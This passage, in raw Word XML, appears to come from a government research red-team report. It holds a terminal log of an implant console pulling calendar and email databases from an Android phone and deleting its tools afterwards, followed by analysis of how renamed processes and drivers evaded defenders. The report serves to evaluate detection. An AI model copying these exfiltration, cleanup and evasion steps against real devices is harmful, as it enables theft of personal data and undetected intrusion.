      <w:r>
        <w:t>MD5(dialer.db) = b4e816ad9d4a8ea7212694e729a841d5                                                                                    │······························</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB70B90" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754389D9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile /data/data/com.android.providers.calendar/databases/calendar.db calendar.db                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C314F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: 'X\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00/data/data/com.android.providers.cal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC77B1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">endar/databases/calendar.db\x00' (88 bytes)                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818B2E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 58 00 00 00 04 00 00 00 00 00 00 00 40 00 00 00  X...........@...                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693BCC1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 40 00 00 00 00 00 00 00 2F 64 61 74 61 2F 64 61  @......./data/da                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD0F7A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 74 61 2F 63 6F 6D 2E 61 6E 64 72 6F 69 64 2E 70  ta/com.android.p                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07B394" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 72 6F 76 69 64 65 72 73 2E 63 61 6C 65 6E 64 61  roviders.calenda                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E812310" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 72 2F 64 61 74 61 62 61 73 65 73 2F 63 61 6C 65  r/databases/cale                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2ADEAD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000050: 6E 64 61 72 2E 64 62 00                          ndar.db.                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD5FBA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\xe0\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643E23FB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0\x01\x01\x00@  \x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x04\x00\x00\x00\x00\x00\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF743FA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>x00\x00\x1b\x00\x00\x00\x01\x00\x00\x02X\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7A7F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">x00\x00\x00\x00\x00\x00\x00\x00\x04\x00.\x10\xfc\x05\x00\x00\x00'...';END' (122904 bytes)                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF34F8C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5(calendar.db) = bdad3b64bd9108576ce3ddab54f32309               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F9D21" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657BCAC9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F6C04" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile /data/data/com.android.email/databases/EmailProvider.db email.db                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FBDFB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: 'P\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x008\x00\x00\x008\x00\x00\x00\x00\x00\x00\x00/data/data/com.android.email/databas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A80892" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">es/EmailProvider.db\x00' (80 bytes)                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395DA055" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 50 00 00 00 04 00 00 00 00 00 00 00 38 00 00 00  P...........8...                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCA7CE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 38 00 00 00 00 00 00 00 2F 64 61 74 61 2F 64 61  8......./data/da                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E7C40" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 74 61 2F 63 6F 6D 2E 61 6E 64 72 6F 69 64 2E 65  ta/com.android.e                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77918B19" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 6D 61 69 6C 2F 64 61 74 61 62 61 73 65 73 2F 45  mail/databases/E                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259234D8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 6D 61 69 6C 50 72 6F 76 69 64 65 72 2E 64 62 00  mailProvider.db.                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502188F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\x10\x02\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C751AD6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0\x01\x01\x00@  \x00\x00\x00\x03\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63936B5E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0\x1e\x00\x00\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AD715" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">\x00\x00\x00\x00\x00\x00\x00\x03\x00.\x10\xfc\x05\x00\x00\x00'...'ger)' (135192 bytes)                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A039D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5(email.db) = b10cea67153921c8d23baa4c67a03799       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541986B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7251C470" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9F21A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;quit                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF99B33" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x004\x00\x00\x00' (8 bytes)                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3BF82" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 34 00 00 00                          ....4...                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349698BF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">breaking out of msg input loop                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EABE9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">finally                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5B8EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54272D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036FC357" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5A550" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ rm tester                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3DD8D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ exit                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47177537" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # exit                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F896B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB0596" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D1FED2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm tester                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10298207" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm barephone-instr.apk                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E0D51" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm lockwatch-instr.apk    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50019230" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67520EA5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ exit                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208B1F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">logout                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F813C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection to 128.55.12.54 closed.             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D98FD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRPr="002D1168" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A132E8F" w14:textId="355BED9D" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A446772" w14:textId="4D009718" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc12600155"/>
      <w:bookmarkStart w:id="274" w:name="_Toc3539577"/>
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="6D3FED66" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRPr="000112FB" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement 5 utilized toolsets which made it much more difficult for the TA2 performers to distinguish malicious behavior from benign traffic.  The majority of the APTs used were in memory attacks.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB47B56" w14:textId="3DE6DCC8" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">It became apparent that the performers had been using our previous attacks against us.  Instead of detecting the activity, the heuristic they adopted was to signature our activity based on known attack procedures such as writing to disk, reusing old process names, etc.  Essentially, they learned out to identify our behavior strings.  An example of this was the kernel driver glx_alsa_675 that just about every performer detected in the previous engagements.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC127FC" w14:textId="77777777" w:rsidR="008C7F35" w:rsidRPr="000112FB" w:rsidRDefault="008C7F35" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6B5F1E" w14:textId="3156CBBE" w:rsidR="005A0BE6" w:rsidRPr="000112FB" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>This engagement we made a concerted effort to change things up.  We modified all of our process names, kernel drivers and procedures so they would not match up with anything they had seen before.  The results of this was that virtually all of our malicious activity went undetected.  This all but confirmed our hypothesis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643217B" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRDefault="00AA267E" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31EC9CA8" w14:textId="2EF0B243" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>During the engagement, there were only two of the four TA2 performers who actively participated.  They were TA5.2 and MARPLE.  RIPE chose not to participate due to obligations associated with OPTC transition efforts.  ADAPT did not participate during the engagement but did provide a report prior to the PI meeting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E51878" w14:textId="77777777" w:rsidR="00AA267E" w:rsidRPr="000112FB" w:rsidRDefault="00AA267E" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D76A525" w14:textId="5C8E12F6" w:rsidR="005A0BE6" w:rsidRPr="000112FB" w:rsidRDefault="005A0BE6" w:rsidP="00AA267E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="_Toc12600156"/>
      <w:r w:rsidRPr="000112FB">
        <w:t>TA5.2 Cyber Protection Team</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="03AF7B7A" w14:textId="70DC60C4" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="005A0BE6" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">TA5.2 CPT participated fully in Engagement 5.  </w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall, we were very impressed with their responsiveness.  In real time they seemed to have the same difficulty as the other performers in that they reported benign activity as malicious.  They were able to detect three of our attacks in real time which was quite impressive.  These were reported a few short minutes after they took place.  This shows that the toolsets they employed, while not perfect, were able to detect nation state activities in real time in some cases.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517936B7" w14:textId="77777777" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7131B6" w14:textId="6BE12517" w:rsidR="00FE6381" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">While they weren’t able to see movement once the attack went into memory, they were able to identify specific IP addresses associated with the attack as well as port numbers.  They also identified privilege escalation during the Firefox Drakon APT Elevate Copykatz attack.  </w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>CPT</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> even reported the new privileges</w:t>
      </w:r>
      <w:r w:rsidR="00365694">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> being added to the process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267301E1" w14:textId="77777777" w:rsidR="00365694" w:rsidRDefault="00365694" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F62508C" w14:textId="236080CA" w:rsidR="00595032" w:rsidRDefault="003A6F0D" w:rsidP="00595032">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="146D6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a52" style="width:346pt;height:114pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId16" o:title="ta52"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
